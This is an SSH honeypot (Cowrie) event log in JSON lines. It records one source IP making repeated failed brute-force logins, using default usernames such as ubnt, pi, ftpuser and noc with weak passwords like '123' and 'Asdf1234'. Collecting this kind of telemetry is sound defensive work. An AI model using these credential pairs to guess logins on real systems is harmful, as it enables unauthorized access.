{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.999717Z","src_ip":"87.120.191.13","session":"f3bbc6e7998b"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"123","message":"login attempt [ubnt/123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:54.028670Z","src_ip":"87.120.191.13","session":"509af2943f61"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:54.089704Z","src_ip":"87.120.191.13","session":"f645034c823c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:54.090334Z","src_ip":"87.120.191.13","session":"f645034c823c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123","message":"login attempt [ftpuser/123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:54.222008Z","src_ip":"87.120.191.13","session":"793abf9a0443"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123","message":"login attempt [pi/123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:54.410623Z","src_ip":"87.120.191.13","session":"f3bbc6e7998b"}
{"eventid":"cowrie.login.failed","username":"noc","password":"123","message":"login attempt [noc/123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:54.603726Z","src_ip":"87.120.191.13","session":"f645034c823c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:54.649328Z","src_ip":"87.120.191.13","session":"181659fb26d5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.133074Z","src_ip":"87.120.191.13","session":"509af2943f61"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49256,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bd31c184776","protocol":"ssh","message":"New connection: 87.120.191.13:49256 (1.2.3.4:22) [session: 2bd31c184776]","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.196164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.424231Z","src_ip":"87.120.191.13","session":"2bd31c184776"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.425500Z","src_ip":"87.120.191.13","session":"2bd31c184776"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.523898Z","src_ip":"87.120.191.13","session":"793abf9a0443"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49262,"dst_ip":"1.2.3.4","dst_port":22,"session":"69197a33a54a","protocol":"ssh","message":"New connection: 87.120.191.13:49262 (1.2.3.4:22) [session: 69197a33a54a]","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.592571Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.827785Z","src_ip":"87.120.191.13","session":"f3bbc6e7998b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49274,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e53809fd9fd","protocol":"ssh","message":"New connection: 87.120.191.13:49274 (1.2.3.4:22) [session: 0e53809fd9fd]","sensor":"my-vps","timestamp":"2025-08-26T13:58:55.910256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.086529Z","src_ip":"87.120.191.13","session":"69197a33a54a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.087327Z","src_ip":"87.120.191.13","session":"69197a33a54a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.122217Z","src_ip":"87.120.191.13","session":"f645034c823c"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49282,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e4db060e41b","protocol":"ssh","message":"New connection: 87.120.191.13:49282 (1.2.3.4:22) [session: 5e4db060e41b]","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.191038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.466288Z","src_ip":"87.120.191.13","session":"0e53809fd9fd"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.466953Z","src_ip":"87.120.191.13","session":"0e53809fd9fd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.854172Z","src_ip":"87.120.191.13","session":"5e4db060e41b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:56.855141Z","src_ip":"87.120.191.13","session":"5e4db060e41b"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"Asdf1234","message":"login attempt [ubnt/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:57.229495Z","src_ip":"87.120.191.13","session":"2bd31c184776"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"Asdf1234","message":"login attempt [ftpuser/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:57.354308Z","src_ip":"87.120.191.13","session":"69197a33a54a"}
{"eventid":"cowrie.login.failed","username":"noc","password":"Asdf1234","message":"login attempt [noc/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:57.480170Z","src_ip":"87.120.191.13","session":"5e4db060e41b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"Asdf1234","message":"login attempt [pi/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:57.776846Z","src_ip":"87.120.191.13","session":"0e53809fd9fd"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.250872Z","src_ip":"87.120.191.13","session":"2bd31c184776"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49294,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b0954a6708d","protocol":"ssh","message":"New connection: 87.120.191.13:49294 (1.2.3.4:22) [session: 8b0954a6708d]","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.270085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.270692Z","src_ip":"87.120.191.13","session":"8b0954a6708d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.290655Z","src_ip":"87.120.191.13","session":"8b0954a6708d"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1","message":"login attempt [ubnt/1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.353561Z","src_ip":"87.120.191.13","session":"8b0954a6708d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.375094Z","src_ip":"87.120.191.13","session":"69197a33a54a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49310,"dst_ip":"1.2.3.4","dst_port":22,"session":"1411af11fd0e","protocol":"ssh","message":"New connection: 87.120.191.13:49310 (1.2.3.4:22) [session: 1411af11fd0e]","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.394483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.395419Z","src_ip":"87.120.191.13","session":"1411af11fd0e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.415029Z","src_ip":"87.120.191.13","session":"1411af11fd0e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1","message":"login attempt [ftpuser/1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.476458Z","src_ip":"87.120.191.13","session":"1411af11fd0e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.500868Z","src_ip":"87.120.191.13","session":"5e4db060e41b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49334,"dst_ip":"1.2.3.4","dst_port":22,"session":"70aabbd7319c","protocol":"ssh","message":"New connection: 87.120.191.13:49334 (1.2.3.4:22) [session: 70aabbd7319c]","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.520046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.520699Z","src_ip":"87.120.191.13","session":"70aabbd7319c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.541651Z","src_ip":"87.120.191.13","session":"70aabbd7319c"}
{"eventid":"cowrie.login.failed","username":"noc","password":"1","message":"login attempt [noc/1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.603412Z","src_ip":"87.120.191.13","session":"70aabbd7319c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.799109Z","src_ip":"87.120.191.13","session":"0e53809fd9fd"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49340,"dst_ip":"1.2.3.4","dst_port":22,"session":"9990100cd6a8","protocol":"ssh","message":"New connection: 87.120.191.13:49340 (1.2.3.4:22) [session: 9990100cd6a8]","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.818922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.819851Z","src_ip":"87.120.191.13","session":"9990100cd6a8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.840318Z","src_ip":"87.120.191.13","session":"9990100cd6a8"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1","message":"login attempt [pi/1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:58.903095Z","src_ip":"87.120.191.13","session":"9990100cd6a8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.375349Z","src_ip":"87.120.191.13","session":"8b0954a6708d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49354,"dst_ip":"1.2.3.4","dst_port":22,"session":"50e4aeed8293","protocol":"ssh","message":"New connection: 87.120.191.13:49354 (1.2.3.4:22) [session: 50e4aeed8293]","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.394307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:59.398487Z","src_ip":"87.120.191.13","session":"50e4aeed8293"}
